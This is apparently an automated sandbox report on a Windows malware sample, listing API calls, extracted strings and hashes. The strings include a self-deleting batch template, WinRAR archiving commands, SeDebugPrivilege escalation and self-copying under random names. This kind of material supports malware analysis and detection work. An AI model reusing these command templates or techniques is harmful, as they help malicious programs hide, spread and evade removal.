                                                                                    control_flow_graph 410 ad6159-ad615d 411 ad615f-ad6189 VirtualFree 410->411 412 ad618c-ad6192 411->412 413 ad6198-ad61b0 VirtualFree 412->413 414 ad60c7-ad60cf 412->414 416 ad61ba-ad61c8 413->416 417 ad61b2-ad61b4 413->417 414->412 415 ad60d5-ad60eb VirtualAlloc 414->415 422 ad60ee-ad60f8 415->422 419 ad61ca-ad61d7 416->419 420 ad6243-ad6251 416->420 417->416 421 ad61dd-ad61e0 419->421 423 ad6264-ad626f 420->423 424 ad6253 420->424 421->420 426 ad61e2-ad61f2 421->426 437 ad60fe-ad6106 422->437 438 ad60fa-ad60fc call ad66c8 422->438 425 ad6271-ad6276 423->425 428 ad6255-ad6258 424->428 429 ad627c-ad6289 425->429 430 ad6389-ad63b1 VirtualProtect 425->430 431 ad61f5-ad61fe 426->431 428->423 433 ad625a-ad6262 428->433 449 ad628b 429->449 450 ad6292-ad6298 429->450 436 ad63b7-ad63ba 430->436 434 ad620c-ad6219 431->434 435 ad6200-ad6203 431->435 433->428 442 ad6238-ad623f 434->442 440 ad621b-ad6228 435->440 441 ad6205-ad6208 435->441 443 ad63fc-ad63ff VirtualProtect 436->443 444 ad63bc-ad63c2 436->444 446 ad6108-ad611d 437->446 447 ad6155 437->447 438->437 440->442 451 ad622a-ad6236 441->451 452 ad620a 441->452 442->431 454 ad6241 442->454 448 ad6400-ad6416 443->448 444->444 453 ad63c4 444->453 455 ad611f-ad6121 446->455 447->411 460 ad6418-ad641d 448->460 461 ad6420-ad6425 448->461 449->450 458 ad62a2-ad62ac 450->458 451->442 452->442 453->443 459 ad63c6-ad63cf 453->459 454->421 456 ad6151-ad6154 455->456 457 ad6123 455->457 456->447 457->456 462 ad6125-ad6128 457->462 463 ad62ae 458->463 464 ad62b1-ad62c8 458->464 465 ad63d4-ad63d8 459->465 466 ad63d1 459->466 467 ad612a-ad612e 462->467 468 ad6134-ad613b 462->468 463->464 469 ad62ce-ad62d4 464->469 470 ad6373-ad6384 464->470 471 ad63dd-ad63e1 465->471 472 ad63da 465->472 466->465 467->468 479 ad6130-ad6132 467->479 468->479 480 ad613d-ad614f 468->480 475 ad62da-ad62f1 469->475 476 ad62d6-ad62d9 469->476 470->425 477 ad63e7-ad63fa VirtualProtect 471->477 478 ad63e3 471->478 472->471 482 ad6365-ad636e 475->482 483 ad62f3-ad62f9 475->483 476->475 477->436 477->443 478->477 479->455 480->455 482->458 484 ad62fb-ad630f 483->484 485 ad6314-ad6326 483->485 486 ad6426-ad64a9 484->486 487 ad634c-ad6360 485->487 488 ad6328-ad634a 485->488 497 ad6519-ad651c 486->497 498 ad64ab-ad64c0 486->498 487->486 488->482 499 ad651d-ad651e 497->499 500 ad6583-ad6587 497->500 504 ad6535-ad6537 498->504 505 ad64c2 498->505 503 ad6522-ad6533 499->503 502 ad6588-ad658b 500->502 506 ad658d-ad658f 502->506 507 ad65a1-ad65a3 502->507 503->504 508 ad6539 504->508 509 ad659a 504->509 510 ad64f8 505->510 511 ad64c5-ad64cd 505->511 512 ad6591-ad6593 506->512 513 ad653b-ad6541 508->513 514 ad65b4 508->514 515 ad659b-ad659d 509->515 518 ad656c-ad656f 510->518 519 ad64fa-ad64fe 510->519 516 ad64cf-ad64d4 511->516 517 ad6542-ad6545 511->517 512->515 520 ad6595 512->520 513->517 525 ad65be-ad6608 514->525 515->512 521 ad659f 515->521 522 ad6517-ad6518 516->522 523 ad64d6-ad64d9 516->523 524 ad654d-ad6550 517->524 526 ad6572 518->526 519->526 527 ad6500 519->527 520->509 521->502 522->497 523->524 529 ad64db-ad64f5 523->529 524->525 530 ad6552-ad6556 524->530 531 ad6573-ad6576 526->531 527->503 532 ad6502 527->532 529->510 533 ad6578-ad657f 530->533 534 ad6558-ad6569 530->534 531->533 532->531 535 ad6504-ad6513 532->535 533->500 534->518 535->504 537 ad6515 535->537 537->522
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00AD60DF
                                                                                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00AD6189
                                                                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00AD61A5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.1753209388.0000000000AD6000.00000040.00000001.01000000.00000005.sdmp, Offset: 00AD0000, based on PE: true
                                                                                    • Associated: 00000006.00000002.1753123173.0000000000AD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753148097.0000000000AD1000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753168092.0000000000AD3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753187503.0000000000AD4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_ad0000_MDSxhU.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$Free$Alloc
                                                                                    • String ID:
                                                                                    • API String ID: 1852963964-0
                                                                                    • Opcode ID: 91f7433384c435a66224973371ef9c094d0f951cac1b5dfebe27d0c3f1ce423f
                                                                                    • Instruction ID: 0f21fd6820d0fa37512604b900c5f7e92a7f5fa70d87fd0327333f6197a6cf54
                                                                                    • Opcode Fuzzy Hash: 91f7433384c435a66224973371ef9c094d0f951cac1b5dfebe27d0c3f1ce423f
                                                                                    • Instruction Fuzzy Hash: 85116D32A00649CFCF318F68CC817DE37A2FF45300F69452ADE8A9B391DA716A40CB94
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe,?,?,?,?,?,?,00AD13EF), ref: 00AD11AB
                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000028,00AD13EF,?,?,?,?,?,?,00AD13EF), ref: 00AD11BB
                                                                                    • AdjustTokenPrivileges.ADVAPI32(00AD13EF,00000000,?,00000010,00000000,00000000), ref: 00AD11EB
                                                                                    • CloseHandle.KERNEL32(00AD13EF), ref: 00AD11FA
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00AD13EF), ref: 00AD1203
                                                                                    Strings
                                                                                    • C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe, xrefs: 00AD11A5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.1753148097.0000000000AD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AD0000, based on PE: true
                                                                                    • Associated: 00000006.00000002.1753123173.0000000000AD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753168092.0000000000AD3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753187503.0000000000AD4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753209388.0000000000AD6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_ad0000_MDSxhU.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                                                                    • String ID: C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe
                                                                                    • API String ID: 75692138-4100433038
                                                                                    • Opcode ID: d5895fa81d64b975c568bb28b4cc686e287fb3723df3fd10b750f3c05ff4765a
                                                                                    • Instruction ID: 3d1dee1397276bce12e5ce7ca3fc126a17e64d84e6a3b7f548a2cbc79fde10b0
                                                                                    • Opcode Fuzzy Hash: d5895fa81d64b975c568bb28b4cc686e287fb3723df3fd10b750f3c05ff4765a
                                                                                    • Instruction Fuzzy Hash: 8401F6B6902209FFDF00DFE4CD89AAEBBB8FB04305F50456AE606A2250D7719F459F51
                                                                                    APIs
                                                                                    • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe), ref: 00AD13BC
                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00AD13DA
                                                                                    • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00AD1448
                                                                                      • Part of subcall function 00AD119F: GetCurrentProcess.KERNEL32(C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe,?,?,?,?,?,?,00AD13EF), ref: 00AD11AB
                                                                                      • Part of subcall function 00AD119F: OpenProcessToken.ADVAPI32(00000000,00000028,00AD13EF,?,?,?,?,?,?,00AD13EF), ref: 00AD11BB
                                                                                      • Part of subcall function 00AD119F: AdjustTokenPrivileges.ADVAPI32(00AD13EF,00000000,?,00000010,00000000,00000000), ref: 00AD11EB
                                                                                      • Part of subcall function 00AD119F: CloseHandle.KERNEL32(00AD13EF), ref: 00AD11FA
                                                                                      • Part of subcall function 00AD119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,00AD13EF), ref: 00AD1203
                                                                                    Strings
                                                                                    • C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe, xrefs: 00AD13A8
                                                                                    • SeDebugPrivilege, xrefs: 00AD13D3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.1753148097.0000000000AD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AD0000, based on PE: true
                                                                                    • Associated: 00000006.00000002.1753123173.0000000000AD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753168092.0000000000AD3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753187503.0000000000AD4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753209388.0000000000AD6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_ad0000_MDSxhU.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                                                                                    • String ID: C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe$SeDebugPrivilege
                                                                                    • API String ID: 4123949106-428744001
                                                                                    • Opcode ID: e096b6170fc4aa0eeb598ad533032b3b99278359cee173052fae2e1abaaea5a8
                                                                                    • Instruction ID: dc8e7751b3d6b8a4d819a6a2d6417954e338ba17be93c582670c29074a946955
                                                                                    • Opcode Fuzzy Hash: e096b6170fc4aa0eeb598ad533032b3b99278359cee173052fae2e1abaaea5a8
                                                                                    • Instruction Fuzzy Hash: 4C314DB1D40209BAEF60DBA68D45FEEBBB8EB44705F20456BE506B7241D6309E85CB60
                                                                                    APIs
                                                                                    • strstr.MSVCRT ref: 00AD23CC
                                                                                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00AD2464
                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00AD2472
                                                                                    • CloseHandle.KERNEL32(?,00000000,00000000), ref: 00AD24A8
                                                                                    • memset.MSVCRT ref: 00AD24B9
                                                                                    • strrchr.MSVCRT ref: 00AD24C9
                                                                                    • wsprintfA.USER32 ref: 00AD24DE
                                                                                    • strrchr.MSVCRT ref: 00AD24ED
                                                                                    • memset.MSVCRT ref: 00AD24F2
                                                                                    • memset.MSVCRT ref: 00AD2505
                                                                                    • wsprintfA.USER32 ref: 00AD2524
                                                                                    • Sleep.KERNEL32(000007D0), ref: 00AD2535
                                                                                    • Sleep.KERNEL32(000007D0), ref: 00AD255D
                                                                                    • memset.MSVCRT ref: 00AD256E
                                                                                    • wsprintfA.USER32 ref: 00AD2585
                                                                                    • memset.MSVCRT ref: 00AD25A6
                                                                                    • wsprintfA.USER32 ref: 00AD25CA
                                                                                    • Sleep.KERNEL32(000007D0), ref: 00AD25D0
                                                                                    • Sleep.KERNEL32(000007D0,?,?), ref: 00AD25E5
                                                                                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00AD25FC
                                                                                    • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00AD2611
                                                                                    • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00AD2642
                                                                                    • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 00AD265B
                                                                                    • SetEndOfFile.KERNEL32 ref: 00AD266D
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00AD2676
                                                                                    • RemoveDirectoryA.KERNEL32(?), ref: 00AD2681
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.1753148097.0000000000AD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AD0000, based on PE: true
                                                                                    • Associated: 00000006.00000002.1753123173.0000000000AD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753168092.0000000000AD3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753187503.0000000000AD4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753209388.0000000000AD6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_ad0000_MDSxhU.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                                                                                    • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user~1\AppData\Local\Temp\
                                                                                    • API String ID: 2203340711-1252250577
                                                                                    • Opcode ID: ef7f3cbf4e0b0387169c5c5716ca944d4a0923c51e061ab54d55a53b7593788b
                                                                                    • Instruction ID: 0d649ccabd5eb017ccb782007b42875d8ec4c008daeb9341d76fa3f84a59e141
                                                                                    • Opcode Fuzzy Hash: ef7f3cbf4e0b0387169c5c5716ca944d4a0923c51e061ab54d55a53b7593788b
                                                                                    • Instruction Fuzzy Hash: 29818FB2505344BBDB10DFA0DC49FAB77ACFB98704F00491BFA4692290D774DA4ACB66
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 00AD2766
                                                                                    • memset.MSVCRT ref: 00AD2774
                                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00AD2787
                                                                                    • wsprintfA.USER32 ref: 00AD27AB
                                                                                      • Part of subcall function 00AD185B: GetSystemTimeAsFileTime.KERNEL32(00AD1F92,00000000,?,00000000,?,?,?,00AD1F92,?,00000000,00000002), ref: 00AD1867
                                                                                      • Part of subcall function 00AD185B: srand.MSVCRT ref: 00AD1878
                                                                                      • Part of subcall function 00AD185B: rand.MSVCRT ref: 00AD1880
                                                                                      • Part of subcall function 00AD185B: srand.MSVCRT ref: 00AD1890
                                                                                      • Part of subcall function 00AD185B: rand.MSVCRT ref: 00AD1894
                                                                                    • wsprintfA.USER32 ref: 00AD27C6
                                                                                    • CopyFileA.KERNEL32(?,00AD4C80,00000000), ref: 00AD27D4
                                                                                    • wsprintfA.USER32 ref: 00AD27F4
                                                                                      • Part of subcall function 00AD1973: PathFileExistsA.SHLWAPI(00AD4E5C,00000000,C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe), ref: 00AD1992
                                                                                      • Part of subcall function 00AD1973: CreateFileA.KERNEL32(00AD4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00AD19BA
                                                                                      • Part of subcall function 00AD1973: Sleep.KERNEL32(00000064), ref: 00AD19C6
                                                                                      • Part of subcall function 00AD1973: wsprintfA.USER32 ref: 00AD19EC
                                                                                      • Part of subcall function 00AD1973: CopyFileA.KERNEL32(00AD4E5C,?,00000000), ref: 00AD1A00
                                                                                      • Part of subcall function 00AD1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AD1A1E
                                                                                      • Part of subcall function 00AD1973: GetFileSize.KERNEL32(00AD4E5C,00000000), ref: 00AD1A2C
                                                                                      • Part of subcall function 00AD1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00AD1A46
                                                                                      • Part of subcall function 00AD1973: ReadFile.KERNEL32(00AD4E5C,00AD4E60,00000000,?,00000000), ref: 00AD1A65
                                                                                    • DeleteFileA.KERNEL32(?,?,00AD4E54,00AD4E58), ref: 00AD281A
                                                                                    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00AD4E54,00AD4E58), ref: 00AD2832
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.1753148097.0000000000AD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AD0000, based on PE: true
                                                                                    • Associated: 00000006.00000002.1753123173.0000000000AD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753168092.0000000000AD3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753187503.0000000000AD4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753209388.0000000000AD6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_ad0000_MDSxhU.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                                                                                    • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user~1\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                                                                                    • API String ID: 692489704-4282063453
                                                                                    • Opcode ID: d0f97c6fe1795e0b00e11bdcb56d1495479b8827a93aa85711a23dc8d2c4e096
                                                                                    • Instruction ID: c5ec3dd625bd012d40850add90f751fd5c38800c2c5e887362886150eb5c24cc
                                                                                    • Opcode Fuzzy Hash: d0f97c6fe1795e0b00e11bdcb56d1495479b8827a93aa85711a23dc8d2c4e096
                                                                                    • Instruction Fuzzy Hash: 57213EB6D412187BEF10E7A49D89FEB776CEB24744F0049A3B647E2241E6709F448AA1
                                                                                    APIs
                                                                                      • Part of subcall function 00AD185B: GetSystemTimeAsFileTime.KERNEL32(00AD1F92,00000000,?,00000000,?,?,?,00AD1F92,?,00000000,00000002), ref: 00AD1867
                                                                                      • Part of subcall function 00AD185B: srand.MSVCRT ref: 00AD1878
                                                                                      • Part of subcall function 00AD185B: rand.MSVCRT ref: 00AD1880
                                                                                      • Part of subcall function 00AD185B: srand.MSVCRT ref: 00AD1890
                                                                                      • Part of subcall function 00AD185B: rand.MSVCRT ref: 00AD1894
                                                                                    • wsprintfA.USER32 ref: 00AD15AA
                                                                                    • wsprintfA.USER32 ref: 00AD15C6
                                                                                    • lstrlen.KERNEL32(?), ref: 00AD15D2
                                                                                    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00AD15EE
                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00AD1609
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00AD1612
                                                                                    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00AD162D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.1753148097.0000000000AD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AD0000, based on PE: true
                                                                                    • Associated: 00000006.00000002.1753123173.0000000000AD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753168092.0000000000AD3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753187503.0000000000AD4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753209388.0000000000AD6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_ad0000_MDSxhU.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                                                                                    • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe$open
                                                                                    • API String ID: 617340118-2066451564
                                                                                    • Opcode ID: 76f4aaa11a5917ba51737fb623d8dcba06f857468d81a2771d320079365e53f7
                                                                                    • Instruction ID: bc26b28ccaeca0a1847f7a081426c753d3ed73a77028903d133ba54a45e5c8a5
                                                                                    • Opcode Fuzzy Hash: 76f4aaa11a5917ba51737fb623d8dcba06f857468d81a2771d320079365e53f7
                                                                                    • Instruction Fuzzy Hash: EE118F73A021287BDB20D7A49C89DEB7B6CEF09750F000553F54AE2140DA709B858AA1
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00AD1400), ref: 00AD1226
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00AD122D
                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,00AD1400), ref: 00AD123F
                                                                                    • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00AD1400), ref: 00AD1250
                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe,?,?,?,?,00AD1400), ref: 00AD129E
                                                                                    • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe,?,?,?,?,00AD1400), ref: 00AD12B0
                                                                                    • CloseHandle.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe,?,?,?,?,00AD1400), ref: 00AD12F5
                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00AD1400), ref: 00AD130A
                                                                                    Strings
                                                                                    • C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe, xrefs: 00AD1262
                                                                                    • ntdll.dll, xrefs: 00AD1219
                                                                                    • ZwQuerySystemInformation, xrefs: 00AD1212
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.1753148097.0000000000AD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AD0000, based on PE: true
                                                                                    • Associated: 00000006.00000002.1753123173.0000000000AD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753168092.0000000000AD3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753187503.0000000000AD4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753209388.0000000000AD6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_ad0000_MDSxhU.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                                                                                    • String ID: C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe$ZwQuerySystemInformation$ntdll.dll
                                                                                    • API String ID: 1500695312-2566351174
                                                                                    • Opcode ID: 812a539230f39562ae268ddc326661496d0606a679344e9ed8af6e77c6de3e85
                                                                                    • Instruction ID: e6e9967b12436513bfba66b168ed9c29aa9cc85b9212386c3b45a3d41c87d896
                                                                                    • Opcode Fuzzy Hash: 812a539230f39562ae268ddc326661496d0606a679344e9ed8af6e77c6de3e85
                                                                                    • Instruction Fuzzy Hash: 3E21F772606311BBDB209B95CC08BABBBA8FB45B01F40092AF547D6340C771D941C7A6
                                                                                    APIs
                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,771AE800,?,?,00AD29DB,?,00000001), ref: 00AD26A7
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,771AE800,?,?,00AD29DB,?,00000001), ref: 00AD26B5
                                                                                    • lstrlen.KERNEL32(?), ref: 00AD26C4
                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00AD26CE
                                                                                    • lstrcpy.KERNEL32(00000004,?), ref: 00AD26E3
                                                                                    • lstrcpy.KERNEL32(?,00000004), ref: 00AD271F
                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00AD272D
                                                                                    • SetEvent.KERNEL32 ref: 00AD273C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.1753148097.0000000000AD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AD0000, based on PE: true
                                                                                    • Associated: 00000006.00000002.1753123173.0000000000AD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753168092.0000000000AD3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753187503.0000000000AD4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753209388.0000000000AD6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_ad0000_MDSxhU.jbxd
                                                                                    Similarity
                                                                                    • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 41106472-0
                                                                                    • Opcode ID: 411c6ff981d0e79634a7e6d76355a5eabf6b5bc582248e35e27d54f9971f5b50
                                                                                    • Instruction ID: 2fc5a53379028a8e0a7640cba696efe772405792ac03100dfb93ef7d86eb25bb
                                                                                    • Opcode Fuzzy Hash: 411c6ff981d0e79634a7e6d76355a5eabf6b5bc582248e35e27d54f9971f5b50
                                                                                    • Instruction Fuzzy Hash: 38118B36502200FFCB31DF94ED4899A7BBAFBA87207104017F89BA7220D7308E86CB50
                                                                                    APIs
                                                                                    Strings
                                                                                    • UQEGRwrNzoCLIKNCZJpdHBoTMJRmKEuxvFtUgObaoYjThLuAsxkiniXXxqHYViSwfIOenwqDmPSLWQVdpbOCDXsvkPGhfcqUGknrYazblHaZFegjAWlyMFylZusBrKtmVDAjpfTedPzIJvQNBEytSgRWcMhc, xrefs: 00AD1B8A, 00AD1B9C, 00AD1C15, 00AD1C49
                                                                                    • .exe, xrefs: 00AD1C57
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.1753148097.0000000000AD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AD0000, based on PE: true
                                                                                    • Associated: 00000006.00000002.1753123173.0000000000AD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753168092.0000000000AD3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753187503.0000000000AD4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753209388.0000000000AD6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_ad0000_MDSxhU.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrcatmemcpymemsetrandsrand
                                                                                    • String ID: .exe$UQEGRwrNzoCLIKNCZJpdHBoTMJRmKEuxvFtUgObaoYjThLuAsxkiniXXxqHYViSwfIOenwqDmPSLWQVdpbOCDXsvkPGhfcqUGknrYazblHaZFegjAWlyMFylZusBrKtmVDAjpfTedPzIJvQNBEytSgRWcMhc
                                                                                    • API String ID: 122620767-10608820
                                                                                    • Opcode ID: 78c810d5080569a20af723c4a456998c24ba58b87c1f157239628336796d2966
                                                                                    • Instruction ID: 11b6c9363f8c53ba4e39cfa923b4ad62640161bc15f3439eabc99eda140077ae
                                                                                    • Opcode Fuzzy Hash: 78c810d5080569a20af723c4a456998c24ba58b87c1f157239628336796d2966
                                                                                    • Instruction Fuzzy Hash: 9A213B23E452907FE31593356C41BAD3B469FBBB11F25409BF5C71B392D1740A878261
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 00AD18B1
                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,771B0F00,75A38400), ref: 00AD18D3
                                                                                    • CloseHandle.KERNEL32(00AD2549), ref: 00AD18E9
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AD18F0
                                                                                    • GetExitCodeProcess.KERNEL32(?,00AD2549), ref: 00AD1901
                                                                                    • CloseHandle.KERNEL32(?), ref: 00AD190A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.1753148097.0000000000AD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AD0000, based on PE: true
                                                                                    • Associated: 00000006.00000002.1753123173.0000000000AD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753168092.0000000000AD3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753187503.0000000000AD4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.1753209388.0000000000AD6000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_ad0000_MDSxhU.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                                                                                    • String ID:
                                                                                    • API String ID: 876959470-0
                                                                                    • Opcode ID: 3442f275c69ce3a877591c2450b33f003beada7450b7b0c34ebad466ad88ac56
